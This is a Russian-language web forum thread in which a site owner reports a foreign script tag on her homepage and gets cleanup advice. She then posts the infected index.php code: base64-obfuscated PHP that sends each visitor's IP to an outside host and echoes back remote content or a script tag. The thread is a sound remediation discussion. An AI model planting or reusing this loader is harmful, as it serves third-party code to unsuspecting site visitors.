Регистрация
Вход через соцсети
Восстановление пароля

Снова о вирусах

Новый топик
11.02.2013, 13:21
Ответить | Цитировать
Gvenv_nk

Зарегистрирован:
2008-03-26
Сообщений: 8

Здравствуйте! Просматривая исходный код главной страницы в браузерах, в самом низу (после </html>) обнаружила следующий код:
Код:
<script src="http://gkvaxwl.freewww.info/rsize.js"></script>

В макетах дизайна его не вижу. Перечитала на форуме переписку о вирусных атаках на сайты, но ответа конкретно на свой вопрос не нашла. Подскажите, где искать концы и как лечить?
11.02.2013, 14:26
Ответить | Цитировать
Asiat
Аниматика
Asiat

Зарегистрирован:
2005-12-12
Сообщений: 567

Симптомы лечить простым текстовым поиском по файлам (скорее всего) и/или поиском по базе данных.
Причину болезни искать сложнее, но для начала просто смените все пароли на хостинге.
Коли будет не лень, проверьте лог-файлы сервера, к которым есть доступ. Лог авторизации, например, лог изменения файлов по FTP... Если определите конкретную дату заражения (часто она же дата модификации файлов), то будет попроще.

Разработка сайтов на Netcat с 2006... хм-м ... или 2005 хммм года. В общем, обращайтесь.
11.02.2013, 14:36
Ответить | Цитировать
Гость
Гость

Туда они его и прописали:
Код:
function sql2_safe($in) {
$rtn = base64_decode($in);
return $rtn;
}
function collectnewss() {

if (!isset($_COOKIE["iJijkdaMnerys"])) {
$value = 'yadeor';
$ip = $_SERVER['REMOTE_ADDR'];
$get = sql2_safe("aHR0cDovL3h4eHBvcm5vLnh4dXouY29tOjg4OC9tb3ZlLnBocD9pcD0=").$ip;
$content = @file_get_contents($get);
@setcookie("iJijkdaMnerys", $value, time()+3600*24);
if (!$content)
echo sql2_safe("PHNjcmlwdCBzcmM9Imh0dHA6Ly9mZWVsdGhlc2FtZS5jaGFuZ2VpcC5uYW1lL3JzaXplLmpzIj48L3NjcmlwdD4=");
else
echo $content;

}
}

Исправила файл на хосте, и срипт пока исчез. Перепроверила .htaccess, vars.inc, в них ничего подозрительного не обнаружила. Данные для входа по фтп и на панель хостинга, естественно, поменяла. Далее воспользуюсь Вашими советами - наверняка же враги так просто не сдадутся.
Спасибо за помощь!
11.02.2013, 14:39
Ответить | Цитировать
Гость
Гость

Имелся в виду файл index.php (это снова я, автор топика).
198 196 2013-02-11 14:39:48 12905
Описание проекта